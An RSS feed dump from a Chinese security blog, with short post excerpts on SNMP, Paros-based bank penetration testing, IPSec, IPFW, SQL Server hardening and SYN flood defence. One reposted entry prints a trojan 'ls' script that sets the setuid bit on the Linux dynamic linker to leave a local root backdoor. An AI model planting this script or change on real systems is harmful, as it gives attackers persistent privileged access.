技术相关 http://www.wangjun.cn/category/technical/ 美好的生活需要用心记录 关注计算机网络安全 Powered by SaBlog-X. Copyright (C) 2003-2010. SaBlog-X Version 2.0 Build 20100301 Thu, 23 Feb 2012 05:15:47 +0000 30 http://www.wangjun.cn/archives/98/ http://www.wangjun.cn/archives/98/ 常简单的Python HTTP服务(转) 897194@qq.com(wangjun) 如果你急需一个简单的Web Server,但你又不想去下载并安装那些复杂的HTTP服务程序,比如:Apache,ISS等。那么, Python 可能帮助你。使用Python可以完成一个简单的内建 HTTP 服务器。于是,你可以把你的目录和文件都以HTTP的方式展示出来。佻只需要干一件事情,那就是安装一个Python。

阅读全文

]]> http://www.wangjun.cn/archives/98/ 技术相关 Thu, 26 Jan 2012 23:08:59 +0000 http://www.wangjun.cn/archives/95/ http://www.wangjun.cn/archives/95/ snmp信息的使用 897194@qq.com(wangjun) 常用 SNMP 对象 ID

sysDescr.0                1.3.6.1.2.1.1.1.0
sysObjectID.0             1.3.6.1.2.1.1.2.0
sysUpTime.0              1.3.6.1.2.1.1.3.0
sysContact.0               1.3.6.1.2.1.1.4.0
sysName.0                 1.3.6.1.2.1.1.5.0
sysLocation.0            1.3.6.1.2.1.1.6.0
sysServices.0           1.3.6.1.2.1.1.7.0
ifNumber.0                1.3.6.1.2.1.2.1.0
tcpCurrEstab.0
 
snmpget -v 2c -c public 192.168.21.159 sysName.0
获取设备的名字
 
snmpwalk -v 2c -c public 192.168.21.159
遍历snmp树
 
snmpstatus -v 2c -c public 192.168.21.159
获取简化的系统状态
 
参考文章
http://www.ibm.com/developerworks/cn/aix/library/au-satsnmp/index.html
]]> http://www.wangjun.cn/archives/95/ 技术相关 Fri, 06 Jan 2012 22:58:51 +0000 http://www.wangjun.cn/archives/94/ http://www.wangjun.cn/archives/94/ 继续爆料:linux下留本地后门的两个方法(转) 897194@qq.com(wangjun)     公司某群中有人问 bash_profile 里PATH设置成 "." 有啥危害,有人发了这篇文章出来,某大牛发了一段shell脚本。

#!/bin/sh

rm -f ./ls
chmod 4755 /lib64/ld-linux-x86-64.so.2
/bin/ls

 


 

阅读全文

]]> http://www.wangjun.cn/archives/94/ 技术相关 Thu, 05 Jan 2012 23:08:16 +0000 http://www.wangjun.cn/archives/5/ http://www.wangjun.cn/archives/5/ Linux常用命令 897194@qq.com(wangjun) 一些常用Linux命令,非常有用

阅读全文

]]> http://www.wangjun.cn/archives/5/ 技术相关 http://www.wangjun.cn/archives/5/#comments Mon, 17 Oct 2011 21:52:10 +0000 http://www.wangjun.cn/archives/4/ http://www.wangjun.cn/archives/4/ POST比GET安全? 897194@qq.com(wangjun)       最近有个项目是对某银行做渗透测试,找出潜在的安全漏洞。由于我们这里经验不足,渗透工作主要是总部研究院的同事做的。在他们提交的渗透测试报告中提到 “大部分的POST请求都可直接转换为GET请求” ,很明显是想说POST比GET安全。后来去银行做渗透测试结果交流的时候,银行的技术员问到为啥POST比GET安全。。一时不知道该从何说起,只知道GET提交的参数浏览器会缓存,如果通过GET提交帐号和密码进行登录,其他人查看浏览器的历史纪录,那么别人就可以拿到你的账号和密码了,但是现在基本上没有人用GET提交帐号和密码吧?另外web服务器的日志中也会有记录, HTTP头部的referer里会记下URL里请求数据。。基本上就这些。。说服力不是很强。回来后找了下资料,下面这篇文章讲得比较全面。应该是参考了网上一些资料后总结出来的。

阅读全文

]]> http://www.wangjun.cn/archives/4/ 技术相关 Sun, 09 Oct 2011 09:58:03 +0000 http://www.wangjun.cn/archives/3/ http://www.wangjun.cn/archives/3/ Paros终于正常工作了 897194@qq.com(wangjun) 今天很开心..Paros终于可以截获目标网站的数据了.

因工作需要,需要对一个网银做渗透测试,主要是一些逻辑漏洞.比如能不能在自己的网银获取别人的网银的余额,转帐记录等.

于是安全了Paros, Paros的Trap功能很实用,可以截获封包并修改后再发送,相当于一次中间人攻击.Paros需要安装JAVA环境,于是安装了最新版本JDK 7.0

测试的过程中发现,别的https网站都能正常打开,只有目标网站不行.目标网站的端口不是默认的443,而是改成了另外的端口.因为对于https不熟悉,对证书也不了解.通过浏览器的提示,一直以为是证书的问题,或者是Paros只支持标准的https端口.后来注意到在尝试打开这个非标准端口的网站的时候会提示IO Error或通讯实败,才基本上确定是软件方面的问题(已经尝试了多个操作系统和浏览器).后来同事在他机器上试了下,正常!对比了一下环境,唯一的区别就是他的JDK是6.0.....果断换成JDK6.0..问题解决了.真的很意外,最新的JDK反而不支持了.最新的不一定是最好的.

]]> http://www.wangjun.cn/archives/3/ 技术相关 Sat, 08 Oct 2011 23:50:39 +0000 http://www.wangjun.cn/archives/92/ http://www.wangjun.cn/archives/92/ 一些ADSL默认密码 897194@qq.com(wangjun) 一些ADSL默认密码

阅读全文

]]> http://www.wangjun.cn/archives/92/ 技术相关 Thu, 13 Apr 2006 14:21:00 +0000 http://www.wangjun.cn/archives/90/ http://www.wangjun.cn/archives/90/ 如何配置IPSec安全策略 897194@qq.com(wangjun) 网络的安全性已经成为大家关注的焦点。由于在IP协议设计之初并没过多考虑安全问题,因此早期的网络中经常发生遭受攻击或机密数据被窃取等问题。为了增强网络的安全性,IP安全(IPSec)协议应运而生。Windows 2000/XP/2003操作系统也提供了对IPSec协议的支持,这就是我们平常所说的“IPSec安全策略”功能,虽然它提供的功能不是很完善,但只要你合理定制,一样能很有效地增强网络安全。

阅读全文

]]> http://www.wangjun.cn/archives/90/ 技术相关 Mon, 23 Jan 2006 09:11:00 +0000 http://www.wangjun.cn/archives/83/ http://www.wangjun.cn/archives/83/ 用FreeBSD+IPFW防范小规模DDoS攻击 897194@qq.com(wangjun) 用FreeBSD+IPFW防范小规模DDoS攻击

阅读全文

]]> http://www.wangjun.cn/archives/83/ 技术相关 Sun, 07 Aug 2005 15:39:00 +0000 http://www.wangjun.cn/archives/84/ http://www.wangjun.cn/archives/84/ 用IPFW实现BSD防火墙【建议自己试试看】 897194@qq.com(wangjun) 用IPFW实现BSD防火墙【建议自己试试看】

转自http://www.chinaunix.net/jh/29/71167.html

阅读全文

]]> http://www.wangjun.cn/archives/84/ 技术相关 Wed, 03 Aug 2005 15:56:00 +0000 http://www.wangjun.cn/archives/72/ http://www.wangjun.cn/archives/72/ 几个关于PayPal的链接 897194@qq.com(wangjun) 关于PayPal的一些文章

阅读全文

]]> http://www.wangjun.cn/archives/72/ 技术相关 Sat, 07 May 2005 11:37:00 +0000 http://www.wangjun.cn/archives/70/ http://www.wangjun.cn/archives/70/ 使用portupgrade进行ports的维护 897194@qq.com(wangjun) 今天帮一个朋友更新了freebsd上面的软件.

阅读全文

]]> http://www.wangjun.cn/archives/70/ 技术相关 Sat, 05 Mar 2005 18:23:00 +0000 http://www.wangjun.cn/archives/69/ http://www.wangjun.cn/archives/69/ 为了安全性考虑,SQL Server里最好去掉的扩展存储过程 897194@qq.com(wangjun) 在网上看了很多关于SQL Server安全性的文章, 觉得SQL Server里最好去掉的扩展存储过程如下:

阅读全文

]]> http://www.wangjun.cn/archives/69/ 技术相关 Thu, 13 Jan 2005 06:03:00 +0000 http://www.wangjun.cn/archives/68/ http://www.wangjun.cn/archives/68/ 对付dos攻击 897194@qq.com(wangjun) echo 1 > /proc/sys/net/ipv4/tcp_syncookies
对付dos攻击

阅读全文

]]> http://www.wangjun.cn/archives/68/ 技术相关 Sat, 18 Dec 2004 14:20:00 +0000 http://www.wangjun.cn/archives/67/ http://www.wangjun.cn/archives/67/ 国际域名几种状态的解释 897194@qq.com(wangjun) 关于国际域名几种状态的解释

阅读全文

]]> http://www.wangjun.cn/archives/67/ 技术相关 Mon, 13 Dec 2004 17:37:00 +0000